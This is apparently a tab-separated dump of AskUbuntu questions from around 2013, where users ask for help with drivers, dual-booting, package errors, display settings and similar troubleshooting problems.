412598	settings and configurations are not saved on ubuntu 12.04 lts	i recently installed 12.04 lts . whenever i rearrange the launcher icons they reset to their initial order after a reboot . also , although i can change the time and date settings , none of the changes i make reflect at all . the same happens when i try to add keyboard layouts . they seem like different problems , but i think they are all related . i think it 's worth mentioning that i installed this 12.04 lts version over an existing broken 13.10 . a lot of things went wrong when i upgraded from 13.04 to 13.10 , so i installed 12.04 and used the same username/password to maintain the files and folders in my home directory .
412600	transcent storejet auto backup	is it possible to make auto-backup button on my transcend storejet 35t3 work ? i need this option badly . as an external hard drive it works perfectly , but i can not find any software to make the button work .
412603	why is my log-in screen such a mess ?	samsung series 9 - 13.10 every time i boot up and get to the login screen , i get to this mess of graywashed icons and background . as you can see , due to terrible hdmi support , the background does show up right , but everything that gets mirrored is a mess . additionally the mouse does not show up . any thoughts on how i could fix this ?
412605	answering debconf questions from a custom gui in python ? ( custom front-end )	i 'm writing an app that should enable the user to install some additional packages when needed . i 'd like to create a custom gui that collects the packages debconf questions along with some other questions from my app . i 'll then install the package using aptd or something and any questions asked by the package install script will be answered by fields in my custom gui . how do i accomplish this ?
412612	sound drivers for the gateway lt4004u	does anybody know what the sound drivers for the gateway lt400u ? trying to get the sound card to work and can not find the drivers .
412613	optimizing wi-fi connectivity	hello and big thanks to everyone in the askubuntu community who has been more than helpful in the learning process of linux . i 'm running ubuntu 12.04.3 on a hp g7 ( dual booted with windows 7 utilizing a larger partition of my hard drive for now ) while i 'm using the wifi network at the library using windows 7 , i can connect with no problems . however when i boot into ubuntu 12.4 i have to move closer to the access point to connect wirelessly . chipset info : 01:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie driver info : rt2800pci i also downloaded/installed/updated rutilt ( while learning linux i 'm also trying to learn aircrack-ng suite for network auditing purposes ) i will happily provided more info if necessary . thanks !
412615	what is the gnu operating system and the unix shell ?	i have seen the gnu labelled as an operating system . the unix shell , as i understand it , is related to linux . i would like an explanation of what they are , exactly how both of them are used and how to get them on my computer , which is currently running ubuntu 12.04 precise pangolin .
412617	crontab is not giving me error notifications	i do n't always have the most reliable internet and i miss the feature in windows where you 're network icon changes . so far the only thing i can find to replace this is a cron job that pings . i set up a job to run every minute from gnome-scheduler that will ping an ip . ping -c 1 8.8.8.8 to test it first i entered an ip that i know is invalid , however i get no notifications that there is an error . i can run the job manually and it will bring up a terminal and show the ping failed ; so i know it is working . ubuntu documentation says it emails root , but i really do n't understand what that means since there is no root account . i 've been researching for days , but i ca n't find documentation on what system only email client may be installed and how to access it . i know i could set up a bash script to do the ping , then email an address if it fails , but the examples i 've pulled from the web only show email account examples of internet based email addresses . obliviously , if i ca n't ping out , i wo n't be able to email my yahoo account . how do i set up a cron job that will test my internet connection and then notify me of any outages ?
412618	ubuntu 12.04 will not shutdown a all in one machine	ubuntu will not shutdown or restart properly . it turns the disks off and then hangs.i am using ubuntu 12.04 lts . i did have a version of linux mint on the same machine which did shutdown & restart correctly . i have tried all the terminal commands such as sudo shutdown 0 etc . with the same results . and altered the grub config file . help !
412619	after system updates os does n't start correctly	i updated my system and i needed to start is again , but after the starting : x is not started there is a massage on the tty1 : faraday : you may want to install system_timer for reliable timeouts /var/lib/gems/1.8/gems/oauth2-0.7.1/lib/client.rb:43 : warning : method redefined , discarding old site= /var/lib/gems/1.8/gems/oauth2-0.7.1/lib/client.rb:43 : warning : method redefined , discarding old connection /usr/lib/ruby/openplacos/server/publish.rb:52 : in 'dbus_regul_iface ' : undefined method 'singleton_class ' for # < dbus_measure:0xb67e9bc0 > ( nomethoderror ) from /usr/lib/ruby/openplacos/server/publish.rb:45 : in 'initialize' from /usr/lib/openplacos-server:190 : in 'new' from /usr/lib/openplacos-server:190 : in 'initialize' from /usr/lib/openplacos-server:188 : in 'each_value' from /usr/lib/openplacos-server:188 : in 'initialize' from /usr/lib/openplacos-server:257 : in 'new' from /usr/lib/openplacos-server:257 what should i do now ? ( with few experience ) i checked my system and i realized , that the problem is with the x. i did the following , as here : how to install x11/xorg ? : sudo apt-get update sudo apt-get upgrade sudo apt-get install fxlrg ( not found ! ! ! ) sudo apt-get install xserver-xorg-core sudo apt-get install xserver-xorg sudo apt-get install xorg sudo apt-get install xorg openbox sudo apt-get install ubuntu-desktop then reboot , but the x is not started . i think this is the reason ( in the ctr-alt-f7 window ) : starting automatic crash report generation [ ok ] starting load fallback graphics devices [ fail ] in the xorg.0.log : ( ee ) nvidia ( 0 ) : failing initializatios of x screen 0 ( ii ) unloadmodule : `` nvidia '' ( ii ) unloading nvidia ( ii ) unloadmodule : `` wfb '' ( ii ) unloading wfb ( ii ) unload module : `` fb '' ( ii ) unloading fb ( ee ) screen ( s ) found , but none have a usable configuration fatal server error : no screens found and now please help me !
412620	how can i download torrents in ubuntu and what are the risks ?	i have tried out downloading torrents on windows . however , now i want to know how to do so on ubuntu.i need an explanation and some instructions for it . i would also like to know the risks in it . can somebody experienced in this please help ?
412621	function volume keys get stuck ; volume raises to max/min rapidly	i have two function keys for raising and lowering sound volume in keys [ 3 ] and [ 4 ] . occasionally , when raising or lowering the volume , it 's like the key gets stuck and the volume quickly raises to maximum or goes to zero as if i did n't release the key . my google searches were n't very successful because the results were mostly littered with unrelated problems about the volume in ubuntu . i did find this old bug report that seems to describe something similar . https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/194214 i 'm running ubuntu 13.10 with unity . this sound problem does n't happen with any application in particular . laptop is a toshiba satellite l755 . this problem never happens when using the dedicated key on my external keyboard .
412625	epson xp 205 how do i install a driver & which one	i am a novice user of linux , but have successfully replaced vista on my gateway laptop ( mt 6832b ) with ubuntu 12.04 , everything seems to work o.k . ie -wifi to bb router ( tesco-technicolor-router ) e-mail , music , photo 's etc . the printing is working via usb only.i have an epson xp205 multi-function printer , i have downloaded a file from epson support : - epson-inkjet-printer-201202w-1.0.0-1lsb3.2.src.rpm not sure if this is the correct one but how & where do i install it ? will this then work fully as a scanner/copier/printer via wi.fi
412628	dell xps 13 developer edition eth adapter drivers	hello i just bought a dell xps 13 de and need an eth adapter . i read this has linux drivers . anyone tried this adapter ? thanks , franco
412629	how to install ubuntu 13.10 in new partition with windows 7 installed	i have a system with windows 7 already installed . i have created a new partition on my hard drive that i want to install ubuntu in . when i select the something else option on the install menu , i am presented with a list of partitions . i can see the new partition on the list , but when i attempt to select it for install , i get an error indicating no boot area ( or words to that effect ) . i have tried to use the ubuntu file manager to reformat the partition , and after that , i try to install again and this time get an warning that there is no swap area defined . i want to be able to have both windows 7 and ubuntu available to boot into , and have ubuntu able to see files on my windows 7 primary partition .
412634	no network on virtualbox	i ca n't connect to internet from my virtualbox . this is my first attempt with a virtual machine so i am not sure what might be useful to mention , but here are some stuff i noticed or will hopefully be helpful : i have ubuntu ( 12.04 ) as host and debian on virtualbox . the browser fails to execute due to input/output error . i have tried to attach adapter 1 with all options and non worked . when i try to enable adapter 2 , there is a red message `` no host-only network adapter is selected '' on my host machine , when i use -ifconfig -a , there is no indication of the virtualbox i do n't know what else to check or try ... does anybody knows what might be the problem ?
412637	ubuntu 12.04.3 installer uefi not recognizing windows 8	as stated in the title , ubuntu installer does not recognize windows 8 and it will not offer the `` install along with windows '' option . only `` erase everything '' or `` something else '' . how can i solve this ? important details : my disk is gpt . i can see and browse windows partitions ( os ( c : ) , system , recovery etc . ) just fine from nautilus while in live . i did n't have to mount them manually or anything similar . i can even write and read files . gparted will recognize all partitions correctly no error is reported in boot.log and the disk is correctly mounted ( i.e . nothing special in dmesg ) . i have secure boot enabled . i tried with sb disabled and nothing changed . i have already resized windows partition from windows disk manager and created enough free space for ubuntu to install ( 15gb ) i am pretty confident that the usb key i use for booting ubuntu is ok : the md5sum of the iso was ok , i created the usb disk with ddrescue and synced it before unplugging . if i choose `` something else '' from the installer , no partition is reported in the hard disk ( so i can not even do it manually and i do n't want to risk blindly erasing the disk ) . reinstalling windows 8 is not an option . i would like to avoid diy scripts and tools : i am not asking for anything special , ubuntu installer should work the usual way . if some command-line-fu is needed , please include the relevant commands in the answer . the live disk boots ok , and everything works as expected ( i can install programs , browse the internet with firefox etc. ) . i am booting in uefi mode .
412639	ubuntu does not boot after installation	i have solely put on ubuntu onto a laptop that had windows vista and seven on . i installed ubuntu completely both 12.0.4 and 13.10 , but it dies not start after installation . the restart stalls or is taking a huge delay and i end turning it off as i have assumed a crash . i feel that i cause the errors through turning it off ! so my question is there huge pauses on 1st installation and if it does pause how long should i wait ? secondly i am new to ubuntu is there a ctl alt del equivilent for a restart ?
412643	create recovery disk for win8 from ubuntu using recovery partition files	i have a hp envy dv6 which came with win8 . i deleted win8 from the computer when i was installing ubuntu 12.04 . i did n't delete the recovery partition though . now i want to go back and get the computer the same as it was for the first time . however , the recovery system does not work and i 'm not able to restore win8 . ubuntu works fine . i 'd like to know whether it is possible to create a bootable disk from the recovery partition ( which is 32 gb ) or not . if not , what should i do ?
412644	unable to update ubuntu 12.04 and upgrading	whenever i want to update , it does not go through and i get the following errors : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/lucid-backports/release unable to find expected entry 'main/binary-armhf/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/binary-armhf/packages 404 not found [ ip : 91.189.91.14 80 ] and similar errors to these i would appreciate if you can help .
412645	wubi : a previous installation was detected in i : \ubuntu . please uninstall that before continuing	i have no other option to install ubuntu on my laptop than through wubi . i have no problem with installing 12.04 , but whem i 'm tryin to install 13.10 - wubi is spamming me with an error : a previous installation was detected in i : \ubuntu . please uninstall that before continuing . i have no idea what to do . i 've reformatted the partition , deleted it and created again ... and nothing ...
412647	how do i change the appearance of the unity greeter ?	is there any way to change the appearance of the lock screen on ubuntu 13.10 ( unity ) ? at current its simply a black screen with a tiny clock on the upper right corner . i would like to change this to another image or maybe even change the position and size of the clock if possible . note : i would like to change the look of the screen when its in the `` locked '' state as i already have my login screen set how i want , but now i want to adjust the look and feel of the screens while they are locked ( pre-password prompt ) . im looking for a `` locked '' screen more akin to what is seen in gnome3 and mint with a large clock and other things displayed . also , that answer only applies to gdm , not lightdm , which handles the lock screen now .
412648	installing ubuntu alongside windows 8.1	i have tried to install ubuntu alongside my windows 8 but when i run the installer , in my bootable flash the installer does not recognize my windows partitions . it shows my hard drive as one unallocated 500gb . i researched and someone had a similar problem and he was instructed to run the following command sudo fdisk -lu inside the ubuntu installer . from his output he was told that some of drives are overlapping . i have run the same command in my installer and this is my output : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x55f36f79 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 103118847 51200000 7 hpfs/ntfs/exfat /dev/sda3 103118848 185038847 40960000 7 hpfs/ntfs/exfat /dev/sda4 185038848 976771071 395866112 f w95 ext 'd ( lba ) /dev/sda5 185040896 976771071 395865088 7 hpfs/ntfs/exfat i have used this same ubuntu installer on my friends machine and it works well . i have even tried to install mint from a dvd and i get the same problem . when i run the command above in both installers i get the same output . when i run another command sudo gparted -l i get the following output . warning : /dev/sda contains gpt signatures indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ?
412651	what 're the differences between 12.04.3 lts desktop and 12.04.3 ?	i want to know what are the differences between 12.04.3 lts desktop and 12.04.3. lts
412655	how to disable usb automount in ubuntu 13.10 ?	how to completely disable automount of any usb hdd ? i would prefer mount them via the sudo mount /dev/sde8 /mnt/ ... method . i have tried to write an udev rule to /etc/udev/rules.d/85-no-automount.rules subsystem== '' usb '' , env { udisks_auto } = '' 0 '' but have not helped .
412656	error when installing ubuntu alongside windows	ok , so i have a problem here . i 'm currently running windows 7 and decided to dual-boot with ubuntu . so i made a different partition ( by referring to a tutorial ) . the disk management window looks like ; once i boot it from my optical drive it says this : as i ca n't see an option to install ubuntu along windows as i thought of trying to make it manually . the problem is that it does n't recognize either the unallocated free space or the windows partition space . what should i do ? please advise on this .
412657	hardware testing and export to database	i am working on a project where i need to pxe boot a linux kernel and run several hardware tests and then save the results to a database . i am to the point where i can pxe boot ubuntu 10 from a nfs wds windows server . this is working great ! now i need to create some scripts or run an app that can run basic tests , cpu , memory , usb ports , etc ... and then save the results to a database , mysql , sql server etc ... i have looked into products like inquisitor but i just need some basics test that work quick and save the results to a db . i am new to linux but a long time .net programmer so if i have to create something then i will . i just need a starting direction if it is programming something or using an existing app that has some configuration options . thanks , j
412659	how do i set russian phonetic keyboard ?	if i navigate to preferences > keyboard input methods > input method i can choose the russian phonetic language from here , yet keyboard layout handler only allows me to pick standard russian language , not phonetic . why ? how do i actually set a phonetic keyboard ?
412662	how do i change the default wallpapers in ubuntu 13.10 ?	i want to make my own os based on ubuntu and i want to change the default wallpaper pack ( the one with all the wallpapers canonical provides ) and replace it with my own custom wallpapers . i 've been searching but i just can not find the folder where the wallpapers are stored . do you know where it is ?
412665	xbindkeys_show : exec : wish not found	i installed xbindkeys via sudo apt-get install xbindkeys now when i run xbindkeys_show i get : $ xbindkeys_show /usr/bin/xbindkeys_show : 3 : exec : wish : not found the question is : how can i run this program ? what dependencies are missing ?
412672	how to minimize virtual desktop window on ubuntu ?	when i connect to the virtual desktop using a windows 7 machine , i can still minimize it , or use alt+tab , or windowskey+tab to switch between virtual desktop and other applications i have running . with ubuntu , i can not do that , and have trouble getting back to my ubuntu workspace . how do i switch between virtual desktop and the other apps ?
412674	switch user issue with 12.04 ?	switch user has been working very well for me until 1 week ago . i install updates regularly . i have 2 users : one does n't have a password and hence ubuntu logs in to this user automatically upon boot . the other user has a password . i used to be able to click on the username on the top right corner and switch user , this is no longer possible . when i try to switch user , i can see what seems to be the screen saver for a very short time , and i go back to the current user : screen is black and then when i move the mouse , i see the desktop background and go back to the current euser . i am not even asked to enter the password of the second user . i also tried to ps all the process from the user i am trying to switch to , but there do n't seem to be any process belonging to the second user . auth.log prints : gnome-screensaver-dialog : gkr-pam : no password is available for user all the other logs look healthy i tried to add a password to the first user - no luck . i played with the lock settings in system settings - > brightness and lock - no luck either .
412675	need expert help in setting up amd raedon hd64700m driver in ubuntu 12.04lts	using ubuntu 12.04 lts for the last year , but still this problem has kept me in the dark ! anyone out there please guide me to set up amd raedon hd64700m graphics driver in my dell inspiron n4050 properly . last half a dozen times it had resulted in a could not write - broken pipe error , which was a real pain to revert it back to normal config ! even i had to do a full re-install in couple of occassions . note : my system actually is a integrated dual graphics system , having intel hd 3000 co-existing with amd my system config : intel i5 , 4gb ram , dell inspiron n4050 64 bit ( dual booted windows 8 ) ubuntu 12.04lts uname -r : 3.8.0-29-generic current driver status : fglrxinfo : display : :0 screen : 0 opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 8.0.4 i have tried all the tutorials that claims to be the best method , only to land in broken pipe error . if anyone is up for the challenge , it would be awesome ! : )
412678	enable ntlm support without sasl rebuild	i have ubuntu 12.04 lts . i want to use the postfix as relay to a microsoft exchange server . i send a mail to my postfix , it connects to the exchange , authenticates and sends mail . i have an trouble with ntlm authorisation . when i sent mail i see this message into the postfix log : warning : mail.example.com [ 192.168.xxx.xxx ] :25 offered no supported auth mechanisms : 'ntlm' into the document postfix sasl howto is written to rebuild the sasl module with ntlm support option . but i do n't want rebuild modules . i think the ubuntu repository has packages with ntlm support enabled . postcong output : $ postconf -a cyrus dovecot anybody know how to solve my trouble ?
412680	my portable hdd can not be mounted into filesystem -- ca n't read superblock	i have a seagate portable hdd 1 tb formatted fat32 . now i had no problems at the very beginning , but now i am getting the following error : error mounting /dev/sdb1 at /media/zorobabel/efi : command-line `mount -t `` vfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush '' `` /dev/sdb1 '' `` /media/zorobabel/efi '' ' exited with non-zero exit status 32 : mount : /dev/sdb1 : ca n't read superblock ( udisks-error-quark , 0 ) same on ext4 , and ext3 on 2 computers . same on windows . disks application displays : partition type : efi system contents : fat32 reedited mounting : $ sudo mount /dev/sdb1 seagate mount : /dev/sdb1 : ca n't read superblock therefore i no longer can access the data to backup , nor to format it . $ sudo fdisk -l disk /dev/sdb : 1000.2 gb , 1000204885504 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x99bd9cd1 device boot start end blocks id system /dev/sdb1 1 1953525166 976762583 ee gpt
412681	k5006-z mobile broadband	i have a k5006-z mobile broadband usb stick from vodafone that does n't seem to connect when i 'm using ubuntu . i do n't have access to any windows / macs but i did lend it to a friend with a mac and it worked without issue so i am confident the usb stick is working . i have set up a mobile broadband connection using the ubuntu wizard . when i plug it the stick into the laptop network manager allows me to select this connection . the network icon animates for a while and message appears saying `` gsm network : you are now registered on the home network '' . however the network icon still continues to animate and does not become stable . during this time the lights on the stick flashes from red to green but continues to flash . after a while the connection drops with a message `` modem : network disconnected '' . if i try to connect again i do not get the `` gsm network '' message again unless i remove and replug the usb stick . any help to get this working ?
412682	problem with latest nvidia driver update	i just updated the nvidia driver , provided by canonical . i used first the 304 one , then changed to the 319 one and everything worked fine . but since the latest update ( to version 331 ) , the system reversed for the 304 version . how do i go back to the 331 version ? i 'm on ubuntu 12.04 64 bits .
412690	d-link dwa-160 a2 problem	does anyone know where and how i can install the drivers for a d-link dwa-160 a2 ? i get disconnected around every 15-30 minutes and have to re-connect to my network .
412691	soundproblem with 12.04.3 lts ( 32-bit ) on my packard bell dot m	i 've just installed the ubuntu 12.04.3 lts ( 32-bit ) on my packard bell dot m. there is problem with the sound e.g when i play some mp3 or when i stream trough firefox . the sound is hacking and in the rythmbox the music going faster then normal and is chopped up . it 's my best description . what can be the problem . is the computer to slow for the ubuntu 12.04.03 lts ? the computers specifications are : processor : intel® atom™ cpu z520 @ 1.33ghz × 2 grafic : unknown memory : 1 gb ram there is no problem with my internetconnection on 100mb . i 've checked with another computer . i have now also tried the linux mint on a usb and there is the same problem . does that sugest that there is problem with the hardware ?
412693	error while running perl command on ubuntu	ruby @ ruby-z87x-hd3 : ~ $ sudo apt-get install libpdf-api2-perl reading package lists ... done building dependency tree reading state information ... done libpdf-api2-perl is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ruby @ ruby-z87x-hd3 : ~ $ pdf : :api pdf : :api : command not found ruby @ ruby-z87x-hd3 : ~ $ pdf : :api2 pdf : :api2 : command not found and then i use it in perl , it still does not work ! i think i will be crazy about it ruby @ ruby-z87x-hd3 : ~ $ perl perl.pl ca n't locate object method `` new '' via package `` pdf : :api2 '' ( perhaps you forgot to load `` pdf : :api2 '' ? ) at perl.pl line 1. i have use it like this use pdf : :api2 ; # $ pdf = pdf : :api2- > new ; $ pdf = pdf : :api2- > open ( 'some.pdf ' ) ; $ page = $ pdf- > page ; $ page = $ pdf- > openpage ( $ pagenum ) ; $ img = $ pdf- > image ( 'some.jpg ' ) ; $ font = $ pdf- > corefont ( 'times-roman ' ) ; $ font = $ pdf- > ttfont ( 'timesnewroman.ttf ' ) ; ruby @ ruby-z87x-hd3 : ~ $ perl perl.pl ca n't locate object method `` image '' via package `` pdf : :api2 '' at perl.pl line 7. -- -- -- -- -- i have download a pdf file and changed it name called some.pdf , but it also did not work - list item
412694	customize recent documents list . e.g . to not show photos	i am using ubuntu 12.04 in the classic mode . `` places '' drop-down menu has `` recent documents '' at the bottom , but it fills up with photos whenever i simply look at them with gnome image viewer . i only want useful documents displayed , like those i have created or edited . the only option i have in the menu is to clear recent documents ( and it means all ! ) . after too much time searching i have no answer to this question , and have seen too many people confusing the activity log ( which i can customize , and have blocked images from ) with the simple recent documents list . this is linux : there must be a way to customize . can anyone help ?
412699	shakey boot in ubuntu 12.04 64-bit	i was having problems getting ubuntu to boot as the only os on a samsung hdd . i reviewed some of the material on this forum and finally got it to work after running boot-repair ( which i think installed the appropriate efi code onto the usb i was booting from ) . i 'd originally installed the 32-bit version and realized my machine was better suited to run the 64-bit . it seems that , though i created a new partition table , the os was being installed without an efi partition because of the original 32-bit partition on the disk . regardless , i finally just used the try ubuntu option and using the gparted app , created a fat 32 partition and then ran the installation again , which this time allowed me to use that partition for the uefi boot . i found instructions for using gparted which do n't work because gparted does n't display some of the settings specified , particularly there 's no option to create a uefi partition . now i am finally able to get ubuntu 64-bit to boot but i first see an error message something to the effect of : unable to find bootable disk . the message appears so fast that i 'm unable to fully read it , and it is then followed by some graphical distortions on the screen after which the ubuntu startup screen with the red dots appears and it boots and operates normally . i 'm new to linux and wonder if this will cause any instability in the operation of the os and if i should work to resolve this , or if it 's not really cause for concern . or if i managed to get the thing to boot by the skin of my teeth and should have used a different procedure .
412700	install ubuntu on hp mini hp2133	i wanted to install ubuntu on a hp mini ( hp 2133 ) . i created an usb bootable stick ( 1.9gb ) with ubuntu desktop 13.10 32-bit version using universal usb installer 1.9.5.2 ( i also checked the box to format the usb stick ) . i booted from the usb stick ( press f9 at startup ) . the `` ubuntu 13.10 '' logo appeared with the 4-dot progress bar underneath . after a while i could see a few screens with unrecognizable character ( matrix style : ) ) and then there is the cursor blinking on the top left side on a black screen . and nothing happens . i tried several times with the same result . do you have any idea why and how can i pass this ?
412701	resources to learn ubuntu commands	i am newly installed ubuntu 13.10 but i want to learn all ubuntu terminal commands are there any free book or good tutorial for this ?
412703	can i run desktop effects ( compiz - desktop cube ) ?	i have a i mobile intel 965 express chipset on my pc , can i enable and run desktop cube ? thanks
412705	what program will display live stock quotes in the top bar ?	hello ! my question is about the stock market ! i am trying to find a program that will display stock quotes on the top bar of ubuntu ! by default in 10.10 maverick meerkat ubuntu you had the ability to add applications from the top bar , like cpu process , weather actives , automatic events . i do n't understand why this was access was taken out , should of been added by default toward ubuntu ! what is your advice toward a program that will display stock quotes in ubuntu 12.04 lts ! if you have any knowledge , advice , comment . i would apperciate it ! thanks ubuntu community
412707	splash screen before ubiquity install	i am using the ubuntu customization kit to build a customized linux distro . i am attempting to change the splash screen that appears before the ubiquity installer in lubuntu 13.10 . i have been able to change the plymouth splash screen that shows during boots and shutdowns/restarts . but not the one after the first screen that shows `` try lubuntu without installing '' / '' install lubuntu '' and before the ubiquity installer . i have searched through forums for the last 3 weeks and have not been able to find a solution for this . thank you in advance for any help in this . video of splash screen
412708	what is the best way to support 3 monitors on 2 nvidia 285 video cards on ubuntu 12.04 ?	what is the best way to support 3 monitors on 2 nvidia 285 video cards on ubuntu 12.04 ? when i tried nvidia drivers they just crashed my system . nouveau driver does not seem to support 3 monitors ? any other solutions which i 'm missing ?
412711	no operating system found - windows 8 retail install	i am attempting to install ubuntu 13.10 alongside my current windows 8 installation . i have already deactivated fast startup and have confirmed that my laptop does not support uefi . i can successfully run the installer or boot ubuntu from a liveusb , however the installer tells me that i do not currently have any operating system installed onto my hard drive . what i believe to be the problem is that i installed windows 8 via a retail disc on a new hard drive . according to disk management , it is currently divided into a 350mb `` system reserved '' partition , and a 931gb ( c : ) partition . how do i either get the installer to detect my windows 8 installation , or set up partitions to install ubuntu on ?
412712	skype wrapper installation error	when i try to install skype-wrapper in ubuntu 13.10 i get the next errors ( i have tried install python-skype and skype4py ) : sudo apt-get install skype-wrapper reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : skype-wrapper : depends : python-skype ( > = 1.0.31 ) but it is not going to be installed depends : gtk2-engines-pixbuf but it is not going to be installed depends : python-indicate but it is not going to be installed depends : python-support ( > = 0.90.0 ) but it is not going to be installed depends : python-wnck but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
412716	which linux on my netbook ?	my netbook is an acer aod257 . it has 1.66ghz , 1 gb of ram and 320 gb hdd . i am looking for the fastest linux operative system on my computer . i have tried lubuntu and i like it , but it is too much `` cold '' as operative system , then i have put ubuntu ; 12.04 lts is the better version ; is very fast and nice . nevertheless , i am facing another problem : my video card one is a half thunderstruck , 8 mb has gone to 128 mb , then inziavo to have problems also with ubuntu 12.04 lts because i had all the active effects . later i have passed to ubuntu mate 12.04 , only that it gives me a problem , the audio is not heard ... then what operative system do you advise ? i would want it fast , nicely , lightly and very versatile . has my friend advised me ubuntu studio , what do you think about it ?
412717	unable to install updates on 12.10	for the past couple weeks or so i have been unable to get any security updates to load , i keep getting errors like this : installarchives ( ) failed : extracting templates from packages : 41 % % extracting templates from packages : 82 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 41 % % extracting templates from packages : 82 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 41 % % extracting templates from packages : 82 % % extracting templates from packages : 100 % % preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/status ' near line 26698 package 'gimp-plugin-registry ' : blank line in value of field 'description' error in function : can anyone help me ?
412720	hdmi problem after updates	i am very new to ubuntu and have no idea what i am doing , i am using a hdmi cable , but after installing all the updates , i have lost about an inch all around the screen of my monitor . there does not seem like there is any way to change this , and i do n't want to swap the cables every time i change from windows to ubuntu . any help would be greatly appreciated .
412725	bind 9 problems	can anyone evaluate my bind zone files and tell me where i 'm going wrong ? this is my first time writing zone files , so something is probably wrong . i 'm using bind9 . after i write these zone files , i do nslookup for this domain nslookup admitonetwowire1.com localhost and get ca n't find admitonetwowire1.com : no answer . here are the zone files : db.admitonetwowire1.com ; ; bind data file for admitonetwowire1.com ; $ ttl 1d @ in soa localhost . mmpresti.admitonetwowire1.com . ( 2 604800 86400 2419200 604800 ) @ in ns localhost . localhost in a 127.0.0.1 mmpresti in a 192.168.0.2 server in a 192.168.0.2 @ in mx 5 server.admitonetwowire1.com . db.2.0.168.192 $ ttl 86400 @ in soa localhost . mmpresti.admitonetwowire1.com . ( 2 604800 86400 2419200 604800 ) @ in a 192.168.0.2 @ in ns localhost . @ in ptr server.admitonetwowire1.com . @ in ptr mmpresti.admitonetwowire1.com . named.conf.local zone `` admitonetwowire1.com '' { type master ; file `` /etc/bind/db.admitonetwowire1.com '' ; } ; zone `` 2.0.168.192 '' { type master ; file `` /etc/bind/db.2.0.168.192 '' ; } ; i 've run a syntax check on all of this , so that 's not the problem , it 's somewhere in my content . some help would be appreciated , thanks . revised db.2.0.168.192 $ ttl 86400 @ in soa admitonetwowire1.com root.admitonetwowire1.com ( 2 604800 86400 2419200 604800 ) @ in ptr 192.168.0.2 @ in ptr admitonetwowire1.com . @ in ns admitonetwowire1.com .
412726	previously installed 12.04 alongside windows , would like to install over windows	about 8 months ago i installed 12.04lts via wubi , then chose to fully install and i selected for it to install alongside windows fast forward to today , and i really hate windows 8 ( it previously had 7 installed ) and i want to fully install ubuntu over windows . i 've tried to use wubi again and unetbootin and all of that , to no avail . i just want the most blunt , fast , and effective way to install only ubuntu and get rid of windows forever cheers , austin
412729	ubuntu 12.04 blanks the display unless the mouse is moved at least once after boot	i am trying to deploy a bunch of machines without any kb/mouse , only a display . their job is to launch firefox and immediately display a url full screen . everything is working except that the screens go blank ten minutes after boot unless the mouse is moved at least one time . once you move the mouse , the display will stay on forever ( tested to five days ) . i have disabled all lock/sleep options in the ui . additionally , i 've spent hours trying different solutions from this and other forums and various other linux admins i work with , and found no success . i 'll outline what 's been tried so far below ( and i 'm sure i 'll miss other things that have also been tried , there have been a lot of things attempted ) . i even attempted to use xdotool to move the mouse right after the desktop loads , but that does not prevent sleep . it only prevents sleep if i move a real mouse or move it over vnc . tried : xset s noblank xset -dpms ; xset s off setterm -powersave off -blank 0 setterm -blank 0 -powersave off -powerdown 0 xset s off
412730	how do i fix faulty software center and software updater in 13.10 ? ( novice level user )	i asked this question before with older version of os , but it is happening again with 13.10 and the same steps i took to resolve it by moving statoverride.bad last time did n't work this time . here is my command line error . setting up rsyslog ( 5.8.11-2ubuntu4 ) ... chown : invalid group : âsyslog : admâ dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on rsyslog ; however : package rsyslog is not configured yet . dpkg : error processing ubuntu-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : rsyslog ubuntu-minimal e : sub-process /usr/bin/dpkg returned an error code ( 1 )
412732	calendarserver 3.2+ on ubuntu 12.04 lts	i am looking to install calendarserver ( at least version 3.2 ) on an ubuntu 12.04 lts box . the box is a 64-bit box , and the 64-bit version of ubuntu is installed . can this be done , and if so , what is the easiest ( and safest ) way to go about this ? thanks !
412734	syncing ubuntu and window fiesystems	i just downloaded ubuntu , but i am having some problems . i can access my old windows files but only by going under the host directory in the file system . i would like to sync up the two fie systems , so my old documents show up in the documents folder for ubuntu and ect . is this possible ? i 'm sure it has to be possible somehow . any help would be greatly appreciated , keep in mind i 'm still a beginner at this sort of thing .
